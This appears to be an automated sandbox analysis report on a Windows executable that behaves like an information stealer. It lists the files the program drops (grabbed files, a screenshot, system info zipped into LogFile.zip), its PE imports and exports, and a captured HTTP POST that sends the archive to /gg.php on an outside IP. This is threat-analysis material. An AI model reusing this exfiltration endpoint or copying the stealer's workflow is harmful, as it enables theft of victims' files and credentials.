Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:a/l/:e/
MD5:	F732BF1006B6529CFFBA2B9F50C4B07F
SHA1:	D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
SHA-256:	77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
SHA-512:	064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_exif.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:EX:EX
MD5:	FC94FE7BD3975E75CEFAD79F5908F7B3
SHA1:	78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
SHA-256:	EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
SHA-512:	4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_sr.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:6:6
MD5:	379523B9F5D5B954E719B664846DBF8F
SHA1:	930823EC80B85EDD22BAF555CAD21CDF48F066AA
SHA-256:	3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
SHA-512:	ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_wide.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:V/l/:/
MD5:	5F243BF7CC0A348B6D31460A91173E71
SHA1:	5696B34625F027EC01765FC2BE49EFCFD882BF8E
SHA-256:	1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
SHA-512:	9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_wide_alternate.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:J:J
MD5:	DB7C049E5E4E336D76D5A744C28C54C8
SHA1:	A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
SHA-256:	E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
SHA-512:	B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\Screenshot.jpg

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	86364
Entropy (8bit):	7.853958352430728
Encrypted:	false
SSDEEP:	1536:CGcIgeNZAuI3qbL7YQTCEjV3Frl7U14kY9i9LEk6qC4+H+bRYqwNbOye91:XcIgcxbbLFXjV1re14kVo2bmsy61
MD5:	E4DD7EF96A76F9B1510979B317109423
SHA1:	A074F3D8F53C97F2E3D2F2F93B560124CC46FE7B
SHA-256:	11D542A806F7FF04CAAE783353269D69CECC508D4961D41B1D0B49EAE6E7E17F
SHA-512:	25AFA1835F614841F65DD1B83E752F889BB1E9E20FC605E2570C33EA82ADF6A9CC53CF66278CF0AACD695E07DE433A71CCF3DC6F949DEED582248E982E8C0297
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A

C:\Users\user\AppData\Local\863CAFA4A9062357328583\System_info.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.335570770643404
Encrypted:	false
SSDEEP:	6:muemWElnXFbRNLQqwBEoNN2RmU9mVW2yUiQPMVWK/lAAAB6nglCGyA2l5:demW8nXFFNLQqwBEoP2d9YW210VWKNA6
MD5:	F537D7FC77C78DACC8356BDA2198E4FE
SHA1:	655A59923574DD7C0C1AD8D3392306015179BFD3
SHA-256:	56657BCBA98EB60B1666075544688D8241930F4950CDC0034E71A2C8A5B6C309
SHA-512:	2BA15EEC91063EBAE860CAD2BED3DFEC9AD53C2005E65C365EFFFD75421F8D78F08F45ABB0B45B813313B6CAB90B374FE188C1667660651595A14DBA2B9E2E4C
Malicious:	false
Preview:	User Name: user..Computer Name: 226533..HWID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..Windows Version: 6.2..Install Path: C:\Users\user\Desktop\CwQQqCmqkY.exe..Processor Architecture: 9..Page Size: 4096..Number of Processors: 4..Processor Type: 8664..RAM Size: 8191 MB..Screen Resolution: 1280 x 1024..System Language: en..BIOS Version: P......

C:\Users\user\AppData\Local\LogFile.zip

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	88529
Entropy (8bit):	7.9541701634816215
Encrypted:	false
SSDEEP:	1536:KV+Ev7ivzCkkNejXTmA9eZHDJ4EWFl2F/Ma4CobRHQAqJ8HDgcso2:KRvOvzCHSp9CHtvPAqJ8jnsR
MD5:	FB4CBB5AC04728326AEC378ABB37D52D
SHA1:	7AD5267DD508BACC37EEC598CD60209BEB089D72
SHA-256:	4261128318796DE0C724A0B46562A5ECC976F671884B381381B078607DEED2E0
SHA-512:	ABBC79B3F5A4B6FB722E8A1F42DFD0254CA2533960D5C6D73E45F5337A5E86F91276636E2A59A89C8FE9CEBDC85E020012D0CED53BA00AA70A70C25CC79225C9
Malicious:	false
Preview:	PK.......... ....j........-...\File_Grabber\0.1.filtertrie.intermediate.txt3.4....PK.......... ....h........-...\File_Grabber\0.2.filtertrie.intermediate.txt3.4....PK.......... .>M..........!...\File_Grabber\1-7FeatureCache.txt]R[..!..@.."....$.m...GB.j[m6o._oW.qN.6.;<V......+...H.3.=...l.U#v..../....i.Y<=2...BM.;.t",2.......Q.[i..LmF....K..K%..w.. WaR.!..fbp.}.rtV6.NisV.;'.:...Y.3gu..sJ...."....G.....!:g.......][..:{..C...j.....A>....7{y..i....U85....Q..Zetn0}.7.h\|.PK.......... .F8P.X.......#...\File_Grabber\AlternateServices.txt..].. ....0b....&BX.~h+(:\|u..qf.Y.Y1oV..>...3...~..=..d..c....bD.bt-35...r.....GU7PK.......... .................\File_Grabber\eventbeacons.dat..PK.......... .0.............\File_Grabber\hub-signature.txte...6.E?.V%..M3....`[...h&$..6e...>Nw%U....}...5,.....N...eT.q^a$Na...'..F.YY......x7N.J..%..NBj......-...E.==.\|.K..:.._n.jb...3..6cB\..%w....;...;..FR.'.......x.>+/.^"....M....z......^v.$Yx`p.P.r.5#o..B/..Q...(..._.g..P

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.481015768352334
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CwQQqCmqkY.exe
File size:	1'014'784 bytes
MD5:	1a477a5659d817b01a50f2a80cb1d76e
SHA1:	48a07f82c03c9a1b7b3c21caf356f1c67775e359
SHA256:	1940ba18ed66dd2f1c3d4dbd2fbf6cf3438bcdee1e108982fb557461106a8073
SHA512:	1689881e40ed47c7e2676da05b82a518220fb7b2626c1365f4855fd5040432029e4f01d6113a8060dcf9657df31a9dfae238fa0adc6fc8a59e2891f971e645fa
SSDEEP:	24576:B7p+HXMi+1rY+HTXxkteD+e8tzNwH72X0P8tIZlZx1a3x/UBJ7tGaF:91VHTBKed8tzNwH72X002Zl43WB9g+
TLSH:	F7259E5A67A401F9D5B7C178C9638207E7B2B455173097DF02E48B662F236E2AF3E720
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J47.+Zd.+Zd.+Zd.SYe.+Zd.S_ek+Zde..d.+Zde.Ye.+Zde.^e.+Zde._e.+Zd.S^e.+Zd..^e.+Zd.].d.+Zd.+[d.*Zd.S[e.+Zd..Se.+Zd..Ze.+Zd..Xe.+Z

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14007a2a8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x676B1A15 [Tue Dec 24 20:31:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5a11a1daae79316451acc3c23c77d259

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F23A1252504h
dec eax
add esp, 28h
jmp 00007F23A1251C2Fh
int3
int3
jmp 00007F23A12528C0h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
jmp 00007F23A1251DC1h
dec eax
mov ecx, ebx
call 00007F23A126D7B2h
test eax, eax
je 00007F23A1251DC5h
dec eax
mov ecx, ebx
call 00007F23A125A8CAh
dec eax
test eax, eax
je 00007F23A1251D99h
dec eax
add esp, 20h
pop ebx
ret
dec eax
cmp ebx, FFFFFFFFh
je 00007F23A1251DB8h
call 00007F23A12528B0h
int3
call 00007F23A11E1236h
int3
dec eax
sub esp, 28h
call 00007F23A1252B8Ch
test eax, eax
je 00007F23A1251DD3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F23A1251DB7h
dec eax
cmp ecx, eax
je 00007F23A1251DC6h
xor eax, eax
dec eax
cmpxchg dword ptr [0007429Ch], ecx
jne 00007F23A1251DA0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F23A1251DA9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F23A1251DB9h
mov byte ptr [00074285h], 00000001h
call 00007F23A1252879h
call 00007F23A1256B90h
test al, al
jne 00007F23A1251DB6h
xor al, al
jmp 00007F23A1251DC6h
call 00007F23A126DCD7h
test al, al
jne 00007F23A1251DBBh
xor ecx, ecx
call 00007F23A1256BA0h
jmp 00007F23A1251D9Ch

Rich Headers

Programming Language:

[ C ] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe9c10	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe9c68	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xf1000	0x9624	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfb000	0x14b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xdbf20	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xdbde0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb7000	0x7e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb5d7c	0xb5e00	d7e72deaccbc9205e6bc310cd6098fe6	False	0.5400034901202749	data	6.440800793292747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb7000	0x344e2	0x34600	55025f43fbc517ce7aa839199117fe23	False	0.4170457935560859	data	5.663833879167456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xec000	0x4860	0x2600	c1ae93d64e938c8a0fe0789fea8b70fe	False	0.16067023026315788	data	3.0636855498834743	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xf1000	0x9624	0x9800	4b7f167d15280ea685ab8ea334f409c5	False	0.4794664884868421	data	5.963337602955454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfb000	0x14b8	0x1600	9b08558e21bdd3c130be2b0f3248011c	False	0.3781960227272727	data	5.32421049706391	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
USER32.dll	GetDesktopWindow, GetClientRect, wsprintfW, GetSystemMetrics, GetDC
ADVAPI32.dll	CryptHashData, CryptEncrypt, CryptImportKey, CryptDestroyKey, CryptDestroyHash, CryptCreateHash, GetUserNameA, GetCurrentHwProfileA, CryptAcquireContextA, CryptReleaseContext, CryptGetHashParam
GDI32.dll	DeleteObject, SelectObject, CreateCompatibleBitmap, BitBlt, CreateCompatibleDC
gdiplus.dll	GdipDisposeImage, GdipAlloc, GdipGetImageEncodersSize, GdipSaveImageToFile, GdiplusStartup, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipCloneImage, GdipFree, GdiplusShutdown
SHLWAPI.dll	StrCmpIW, PathFindExtensionW
bcrypt.dll	BCryptGenRandom
KERNEL32.dll	CreateProcessW, GetExitCodeProcess, FlushFileBuffers, SetStdHandle, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, LoadLibraryA, GetProcAddress, HeapAlloc, GetProcessHeap, HeapFree, SetLastError, VirtualFree, VirtualAlloc, FreeLibrary, GetLastError, DeleteFileW, RaiseException, SetCurrentDirectoryW, GetModuleHandleW, CreateDirectoryW, GetSystemFirmwareTable, GetModuleFileNameA, FindFirstFileW, FindNextFileW, GetLocaleInfoEx, GetUserDefaultUILanguage, FindClose, WaitForSingleObject, CreateFileW, GetVersionExA, CloseHandle, GetSystemInfo, GlobalMemoryStatusEx, CopyFileW, GetComputerNameA, TerminateProcess, RemoveDirectoryW, FindFirstFileA, FindNextFileA, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, GetOEMCP, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceFrequency, GetSystemDirectoryA, GetModuleHandleA, SleepEx, QueryPerformanceCounter, GetTickCount, Sleep, MultiByteToWideChar, WideCharToMultiByte, FormatMessageW, SetEndOfFile, WaitForSingleObjectEx, GetEnvironmentVariableA, GetStdHandle, GetFileType, ReadFile, PeekNamedPipe, WaitForMultipleObjects, GetCurrentProcessId, VerSetConditionMask, VerifyVersionInfoW, CreateFileA, GetFileSizeEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetStringTypeW, LCMapStringEx, EncodePointer, DecodePointer, CompareStringEx, RtlUnwind, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, GetFullPathNameW, GetCurrentDirectoryW, HeapReAlloc, GetConsoleOutputCP, ReadConsoleW, GetConsoleMode, ExitProcess, GetModuleFileNameW, WriteFile, SetFilePointerEx, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileInformationByHandle, GetDriveTypeW, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RtlPcToFileHeader, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetFileAttributesExW, FindFirstFileExW, IsValidCodePage, MoveFileExA, GetACP, SetEnvironmentVariableW, GetTimeZoneInformation, HeapSize, WriteConsoleW, LeaveCriticalSection, GetCPInfo, RtlUnwindEx
WS2_32.dll	WSAIoctl, socket, setsockopt, recv, htons, getsockname, getpeername, select, bind, WSACleanup, WSAStartup, WSASetLastError, ntohs, WSAGetLastError, closesocket, WSAWaitForMultipleEvents, WSAResetEvent, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, send, getsockopt, accept, __WSAFDIsSet, gethostname, htonl, listen, getaddrinfo, freeaddrinfo, recvfrom, ioctlsocket, sendto, connect
CRYPT32.dll	CryptQueryObject, CertCreateCertificateChainEngine, CertFreeCertificateChainEngine, CertGetCertificateChain, CertFreeCertificateChain, CertGetNameStringA, CertFindExtension, CertAddCertificateContextToStore, CryptDecodeObjectEx, PFXImportCertStore, CryptStringToBinaryA, CertFreeCertificateContext, CertFindCertificateInStore, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore
WLDAP32.dll
Normaliz.dll	IdnToUnicode, IdnToAscii

Exports

Name	Ordinal	Address
?ReflectiveLoader@@YA_KXZ	1	0x1400ace34

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:04:19.428611+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.2.6	49733	185.81.68.147	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:04:19.022615910 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.142203093 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.142359972 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.145828962 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.265773058 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265796900 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265811920 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265825987 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265853882 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265867949 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265882969 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265897036 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265901089 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.265923023 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265937090 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.265963078 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.266015053 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.385525942 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385560036 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385605097 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385643959 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385689974 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.385734081 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385746956 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.385761023 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.385792971 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.385807991 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.428467035 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.428611040 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.548437119 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.549288034 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.592350006 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.712435961 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.713485956 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:19.916455030 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:19.916661024 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:20.160584927 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:20.226600885 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:21.497129917 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:21.497384071 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:21.497442007 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:21.497493029 CET	49733	80	192.168.2.6	185.81.68.147
Dec 26, 2024 12:04:21.617589951 CET	80	49733	185.81.68.147	192.168.2.6
Dec 26, 2024 12:04:21.617935896 CET	49733	80	192.168.2.6	185.81.68.147

HTTP Request Dependency Graph

185.81.68.147

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49733	185.81.68.147	80	4144	C:\Users\user\Desktop\CwQQqCmqkY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 12:04:19.145828962 CET	12360	OUT	POST /gg.php HTTP/1.1 Host: 185.81.68.147 Accept: / Content-Length: 88734 Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3r Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc [TRUNCATED] Data Ascii: --------------------------A4fnrY2DGEqCNctsQoPM3rContent-Disposition: form-data; name="log"; filename="LogFile.zip"Content-Type: application/zipPK j-\File_Grabber\0.1.filtertrie.intermediate.txt34PK h-\File_Grabber\0.2.filtertrie.intermediate.txt34PK >M!\File_Grabber\1-7FeatureCache.txt]R[!@"$mGBj[m6o_oWqN6;<V+H3=lU#v/iY<=2BM;t",2Q[iLmFKK%w WaR!fbp}rtV6NisV;':Y3gusJ"G!:g][:{CjA>7{yiU85QZetn0}7h\|PK F8PX#\File_Grabber\AlternateServices.txt] 0b&BX~h+(:\|uqfYY1o*V>3~=dcbDbt-35rGU7PK \File_Grabber\eventbeacons.datPK 0\File_Grabber\hub-signature.txte6E?V%M3`[h&$6e>Nw%U}5,NeTq^a$Na'FYYx7NJ% [TRUNCATED]
Dec 26, 2024 12:04:19.265901089 CET	9888	OUT	Data Raw: 4f c3 aa e3 85 a3 65 cc d0 a9 76 f6 9d 95 3e ca 22 7b cd 1d 8a 97 33 eb 8c 9f bf 46 2e c4 23 a7 ae d6 75 38 5d 78 32 3f bf 7e 50 9b 59 27 35 16 17 21 8a 22 26 a1 f5 9e ac 8d ad 34 6d df 7a e4 21 ce 5c 56 60 ed 52 e4 f1 67 4c f1 65 15 5a e8 4e fc Data Ascii: Oev>"{3F.#u8]x2?~PY'5!"&4mz!\V`RgLeZN{DyZ)1Q^,}zsps,U2YU9udr'VVNP{?4eM~BZP%$[cPi<y6'Q>jx
Dec 26, 2024 12:04:19.265963078 CET	12360	OUT	Data Raw: 9b 4e 58 51 fd 16 0d 3f 35 f1 c5 61 ce ae ae 6a 0f 27 3e 9d c9 c7 61 28 cb 85 d9 f1 a7 2a 65 a9 18 7b b4 e1 b3 5e 68 76 c8 7f 33 60 22 c2 1e 71 9f 03 ce b8 f1 ae de f0 7a f7 54 00 90 aa 1a d4 cf 7e 79 6f 2c 87 e9 58 a3 8e 04 3c 50 7c f8 8c 38 99 Data Ascii: NXQ?5aj'>a(*e{^hv3`"qzT~yo,X<P\|8Smr[%E+o/{g/u`b^:{>m:@v}wvrL.siXV,sD&uY(U^k'7!K^yUL9]m60w([
Dec 26, 2024 12:04:19.266015053 CET	2472	OUT	Data Raw: 59 2b 38 aa 24 bc 02 17 b8 79 35 1a 26 ac 8b 43 4a 2b 93 02 22 e5 96 01 b9 a9 b6 4a ab d4 d5 9a d1 09 29 5f 73 17 cc 43 3b fd 1e 0d 3f 51 5b a5 32 9d 40 31 3b d4 bf d3 78 62 ee 0f a3 98 37 8c 67 98 cb 61 d5 b0 8e 29 1b 3a 1a 82 32 bc 33 8f de 0b Data Ascii: Y+8$y5&CJ+"J)_sC;?Q[2@1;xb7ga):23ZtHxeO\|Msxks!Cv9rFHg6~;-UPD%]PW5[^VVPi5RW>r}<-F({
Dec 26, 2024 12:04:19.385689974 CET	7416	OUT	Data Raw: f9 d0 90 38 9a c7 60 7a f9 4d a9 22 95 8a 9e 92 d3 ee 6d be 07 d4 69 1b 0b d1 aa 56 ae 96 dc 02 77 af 08 88 3b b9 2c bd 3f 13 f0 17 bc 6b 06 bd 13 39 ae be ee 34 9a f1 b0 f6 5a 6d 9d 53 d6 f8 0d 82 c7 75 77 3f 34 aa 1d 66 ea 91 cc 5b c5 d7 2c 10 Data Ascii: 8`zM"miVw;,?k94ZmSuw?4f[,}*M<n&!I:P\|#kkCmvM<<86B'n}lD3\;>,e"nZ&eix\|-dFL
